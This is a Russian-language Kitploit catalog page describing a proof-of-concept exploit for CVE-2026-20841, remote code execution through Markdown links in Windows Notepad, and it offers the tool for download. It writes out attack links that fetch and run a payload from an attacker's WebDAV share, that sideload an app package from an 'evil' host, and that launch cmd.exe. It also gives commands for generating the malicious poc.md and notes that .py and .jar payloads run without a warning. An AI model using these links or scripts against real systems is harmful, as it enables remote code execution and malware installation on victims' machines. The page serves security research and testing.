Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-20841 — Доказательство концепции эксплуатации CVE-2026-20841 — удалённое выполнение кода в Блокноте Windows через ссылки в Markdown. Генерирует специально созданные .md-файлы для запуска удалённых полезных нагрузок, боковой загрузки приложений или выполнения локальных бинарных файлов. | Kitploit
Инструменты/GitHubGitHub/atiilla/cve-2026-20841
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubatiilla/cve-2026-20841

CVE-2026-20841

Доказательство концепции эксплуатации CVE-2026-20841 — удалённое выполнение кода в Блокноте Windows через ссылки в Markdown. Генерирует специально созданные .md-файлы для запуска удалённых полезных нагрузок, боковой загрузки приложений или выполнения локальных бинарных файлов.

Репозиторий
5467 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-20841 — RCE в Windows Блокноте

PoC для эксплуатации удалённого выполнения кода в рендерере Markdown Windows Блокнота. Механизм Markdown не ограничивает протоколы URL, что позволяет запускать произвольные обработчики протоколов через кликабельные ссылки.

Отказ от ответственности

  1. Не моя находка. Заслуга принадлежит оригинальным исследователям из консультации MSRC. Это воссоздание PoC.
  2. Серьёзность ниже, чем звучит. В большинстве случаев требуется более одного клика (см. Ограничения). Создано потому, что «RCE в Блокноте» — слишком забавно, чтобы пройти мимо.

Векторы атаки

1. Удалённая полезная нагрузка (file:///)

root@kitploit:~
[click](file:///\\attacker@5005\DavWWWRoot\payload.py)

Протокол file:/// разрешает удалённые UNC-пути. Укажите ссылку на полезную нагрузку, и Windows загрузит и выполнит её по клику.

2. Боковая загрузка приложений (ms-appinstaller://)

root@kitploit:~
[click](ms-appinstaller://?source=https://evil/xxx.appx)

Открывает установщик приложений с пакетом .appx/.msix, предоставленным атакующим.

3. Запуск локальных бинарников (file://)

root@kitploit:~
[click](file://C:/windows/system32/cmd.exe)

Запускает любой исполняемый файл, уже находящийся на диске, — cmd.exe, powershell.exe, mshta.exe и т. д.

Использование

Оба скрипта создают файл poc.md с поддельной ссылкой в текущем каталоге.

root@kitploit:~
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
root@kitploit:~
# пример
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md

Тестовые полезные нагрузки находятся в payloads/.

Ограничения

  1. Опасные расширения по-прежнему помечаются. .exe, .lnk, .vbs и подобные вызывают предупреждение безопасности Windows независимо от поведения Блокнота.
  2. Расширения интерпретаторов обходят предупреждение. .py и .jar выполняются беззвучно, если на целевой системе установлены Python или Java.

Примечания

  • Уязвимые сборки Блокнота доступны на Uptodown. Проверьте цифровую подпись перед использованием.
  • Тестируйте только в виртуальной машине.

Будьте осторожны!

Скачать инструмент